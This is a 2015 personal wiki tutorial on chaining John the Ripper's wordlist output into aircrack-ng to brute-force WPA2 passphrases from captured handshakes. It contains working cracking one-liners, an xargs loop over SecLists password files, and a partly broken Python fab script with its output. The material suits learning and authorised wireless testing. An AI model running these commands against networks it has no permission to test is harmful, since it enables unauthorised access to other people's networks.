Aircrack and John the Ripper

From charlesreid1

Revision as of 17:42, 1 August 2015 by Admin (talk | contribs)

What is Aircrack

We have met Aircrack before - it's a tool used for sniffing out the right WEP and WPA packets to crack the network's encryption. One of the last steps, once you've captured the proper packets, is to brute-force guess the WPA passphrase. This is where John can help.

What is John

John the Ripper is a tool for guessing weak passwords on user accounts. It's good at generating a whole bunch of random passwords that are based on words, or modifications of words, or numbers.

You can use John in conjunction with Aircrack, by telling John to just print out all of the words it has generated to stdout, and then using stdout as the aircrack wordlist/dictionary. This allows you to just let John crank away. There are certainly better ways to do it, but this can be a quick check for weak passwords.

Getting Set Up

To use Aircrack with John, you'll need to make sure you have both installed. If you're on Kali you're good to go.

John Modes

You can use John in multiple different modes, and depending on the mode, you'll either be waiting a few minutes, or a few years. Choose wisely.

Incremental All Mode (Exhaustive)

If you call John with the --incremental=allflag, that specifies incremental mode, which will go through every single painstaking combination. This means we don't have to supply a wordlist, but it also means we're going to be coming up with a lot of garbage guesses.

Specifying a Wordlist

If you want to specify a wordlist for John to use (like one of the many fantastic password lists in this Github repo: https://github.com/danielmiessler/SecLists), you can do so with the -w flag: 

-w=password.lst


John-Aircrack Command

There is no "final" John-to-Aircrack command, at least not until the passphrase is cracked.

The first one I tried looked like this: 

$ john -w=10_million_password_list_top_1000.txt --session=attack1 --stdout | aircrack-ng -a 2 -e ASDF asdf-01.cap -w -

Let's go through this one bit at a time:



--session=attack1: this tells John to keep track of where it is at in the process and what passwords it has guessed, which will make it possible to restore the session in case the process dies or is interrupted.

--stdout: print all words that John would have otherwise tried itself to stdout, so that some other program can use them

-a 2: this specifies the encryption protocol as WPA2

-e ASDF: this is the name of the wireless network whose WPA passphrase we're trying to crack

asdf-01.cap: this is the capture file from our earlier-run airomon-ng command.

-w -: the -w flag specifies a wordlist. Since, in this case, - by itself represents stdin (what John is piping in), this means we're using John's generated words as an aircrack wordlist.

Using Multiple Wordlists with John the Ripper

You can combine xargs with John to use one wordlist at a time: 

$ ls ~/wordlists/*.txt | xargs -t -I% john --session=attack1 --wordlist=%    [etc..... ]

So to put it all together: we will issue a one-line command. It will iterate through each wordlist in a given directory. For each wordlist, it will run John with that wordlist, and John will print a variety of words to try based on that wordlist. That output is then piped to Aircrack. 

$ ls ~/wordlists/*.txt | xargs -t -I% john --session=attack1 --wordlist=%  --stdout | aircrack-ng -a 2 -e ASDF asdf-01.cap -w -

This will use all of our wordlists to try and crack the encryption on the network ASDF, where airodump created asdf-01.cap and the file asdf-01.cap has at least one handshake in it.

Scripting with Python

Aircrack's main/default interface is NOT scripting-friendly (example: when you run aircrack on a capture file, and it finds a matching passphrase, it prints the result to the screen - but it doesn't save it to a file. Inexplicably. So if you accidentally close your window after ten days of cranking away, then, too bad, I guess?!?)

Then there's the complication that if you run these jobs in the background with tmux or screen, the output gets completely screwed up if you change window widths, and you CANNOT see Aircrack's results printed to the screen after you screw up the output. What a mess.

So let's talk about how to make them slightly more scriptable with Python.

Installing Fab

We'll use fab, which gives Python Makefile-like functionality.

Before, we were stringing together a long command, where we piped names of text files from ls to john to aircrack.

Let's use fab instead. We'll be replacing this command line: 

ls ~/codes/seclists/Passwords/*.txt | xargs -t -I% john -ssession=tig --wordlist=% --stdout | aircrack-ng -a 2 -e Tig tig-02.cap

Getting List of Wordlist Files

First step is to get a Python list populated by text file names: 

get_wordlist_list():
    raw = local('/bin/ls -1 /root/codes/seclists/Passwords/*.txt', capture=True)
    wordlist_list = raw.splitlines()

and run like so: 

$ fab get_wordlist_list

Using the List of Wordlists

Now how can we use this list of wordlists?

Here's a quick example of constructing a call to john using a particular wordlist: 

def get_wordlist_list():
    raw = local('/bin/ls -1 /root/codes/seclists/Passwords/*.txt', capture=True)
    wordlist_list = raw.splitlines()
    for iw,wordlist in enumerate(wordlist_list):
        print "john --session=sess%d --wordlist=%s --stdout"%(iw,wordlist)

with the result: 

$ fab get_wordlist_list
[localhost] local: /bin/ls -1 /root/codes/seclists/Passwords/*.txt
john --session=sess0 --wordlist=/root/codes/seclists/Passwords/10k_most_common.txt --stdout
john --session=sess1 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_1000000.txt --stdout
john --session=sess2 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_100000.txt --stdout
john --session=sess3 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_10000.txt --stdout
john --session=sess4 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_1000.txt --stdout
john --session=sess5 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_100.txt --stdout
john --session=sess6 --wordlist=/root/codes/seclists/Passwords/10_million_password_list_top_500.txt --stdout
john --session=sess7 --wordlist=/root/codes/seclists/Passwords/500-worst-passwords.txt --stdout
john --session=sess8 --wordlist=/root/codes/seclists/Passwords/adobe100.txt --stdout
john --session=sess9 --wordlist=/root/codes/seclists/Passwords/alleged-gmail-passwords.txt --stdout
john --session=sess10 --wordlist=/root/codes/seclists/Passwords/Basic_Spanish_List.txt --stdout
john --session=sess11 --wordlist=/root/codes/seclists/Passwords/best1050.txt --stdout
john --session=sess12 --wordlist=/root/codes/seclists/Passwords/best110.txt --stdout
john --session=sess13 --wordlist=/root/codes/seclists/Passwords/best15.txt --stdout
john --session=sess14 --wordlist=/root/codes/seclists/Passwords/bible-nocount.txt --stdout
john --session=sess15 --wordlist=/root/codes/seclists/Passwords/bible-withcount.txt --stdout
john --session=sess16 --wordlist=/root/codes/seclists/Passwords/carders.cc.txt --stdout
john --session=sess17 --wordlist=/root/codes/seclists/Passwords/conficker.txt --stdout
john --session=sess18 --wordlist=/root/codes/seclists/Passwords/darkc0de.txt --stdout
john --session=sess19 --wordlist=/root/codes/seclists/Passwords/elitehacker-nocount.txt --stdout
john --session=sess20 --wordlist=/root/codes/seclists/Passwords/elitehacker-withcount.txt --stdout
john --session=sess21 --wordlist=/root/codes/seclists/Passwords/english.txt --stdout
john --session=sess22 --wordlist=/root/codes/seclists/Passwords/faithwriters-nocount.txt --stdout
john --session=sess23 --wordlist=/root/codes/seclists/Passwords/faithwriters-withcount.txt --stdout
john --session=sess24 --wordlist=/root/codes/seclists/Passwords/german.txt --stdout
john --session=sess25 --wordlist=/root/codes/seclists/Passwords/hak5-nocount.txt --stdout
john --session=sess26 --wordlist=/root/codes/seclists/Passwords/hak5-withcount.txt --stdout
john --session=sess27 --wordlist=/root/codes/seclists/Passwords/honeynet-withcount.txt --stdout
john --session=sess28 --wordlist=/root/codes/seclists/Passwords/john.txt --stdout
john --session=sess29 --wordlist=/root/codes/seclists/Passwords/mubix_izmy.txt --stdout
john --session=sess30 --wordlist=/root/codes/seclists/Passwords/myspace-withcount.txt --stdout
john --session=sess31 --wordlist=/root/codes/seclists/Passwords/password-permutations.txt --stdout
john --session=sess32 --wordlist=/root/codes/seclists/Passwords/passwords_clarkson_82.txt --stdout
john --session=sess33 --wordlist=/root/codes/seclists/Passwords/passwords_john.txt --stdout
john --session=sess34 --wordlist=/root/codes/seclists/Passwords/passwords_youporn2012_raw.txt --stdout
john --session=sess35 --wordlist=/root/codes/seclists/Passwords/passwords_youporn2012.txt --stdout
john --session=sess36 --wordlist=/root/codes/seclists/Passwords/phpbb-withcount.txt --stdout
john --session=sess37 --wordlist=/root/codes/seclists/Passwords/porn-unknown-withcount.txt --stdout
john --session=sess38 --wordlist=/root/codes/seclists/Passwords/rockyou-10.txt --stdout
john --session=sess39 --wordlist=/root/codes/seclists/Passwords/rockyou-15.txt --stdout
john --session=sess40 --wordlist=/root/codes/seclists/Passwords/rockyou-20.txt --stdout
john --session=sess41 --wordlist=/root/codes/seclists/Passwords/rockyou-25.txt --stdout
john --session=sess42 --wordlist=/root/codes/seclists/Passwords/rockyou-30.txt --stdout
john --session=sess43 --wordlist=/root/codes/seclists/Passwords/rockyou-35.txt --stdout
john --session=sess44 --wordlist=/root/codes/seclists/Passwords/rockyou-40.txt --stdout
john --session=sess45 --wordlist=/root/codes/seclists/Passwords/rockyou-45.txt --stdout
john --session=sess46 --wordlist=/root/codes/seclists/Passwords/rockyou-50.txt --stdout
john --session=sess47 --wordlist=/root/codes/seclists/Passwords/rockyou-55.txt --stdout
john --session=sess48 --wordlist=/root/codes/seclists/Passwords/rockyou-5.txt --stdout
john --session=sess49 --wordlist=/root/codes/seclists/Passwords/rockyou-60.txt --stdout
john --session=sess50 --wordlist=/root/codes/seclists/Passwords/rockyou-65.txt --stdout
john --session=sess51 --wordlist=/root/codes/seclists/Passwords/rockyou-70.txt --stdout
john --session=sess52 --wordlist=/root/codes/seclists/Passwords/rockyou-75.txt --stdout
john --session=sess53 --wordlist=/root/codes/seclists/Passwords/rockyou.txt --stdout
john --session=sess54 --wordlist=/root/codes/seclists/Passwords/rockyou-withcount.txt --stdout
john --session=sess55 --wordlist=/root/codes/seclists/Passwords/singles.org-withcount.txt --stdout
john --session=sess56 --wordlist=/root/codes/seclists/Passwords/splashdata_2014.txt --stdout
john --session=sess57 --wordlist=/root/codes/seclists/Passwords/splashdata_2015.txt --stdout
john --session=sess58 --wordlist=/root/codes/seclists/Passwords/top_shortlist.txt --stdout
john --session=sess59 --wordlist=/root/codes/seclists/Passwords/twitter-banned.txt --stdout
john --session=sess60 --wordlist=/root/codes/seclists/Passwords/UserPassJay.txt --stdout
john --session=sess61 --wordlist=/root/codes/seclists/Passwords/wordpress_attacks_july2014.txt --stdout
Retrieved from "https://charlesreid1.com/w/index.php?title=Aircrack_and_John_the_Ripper&oldid=7486"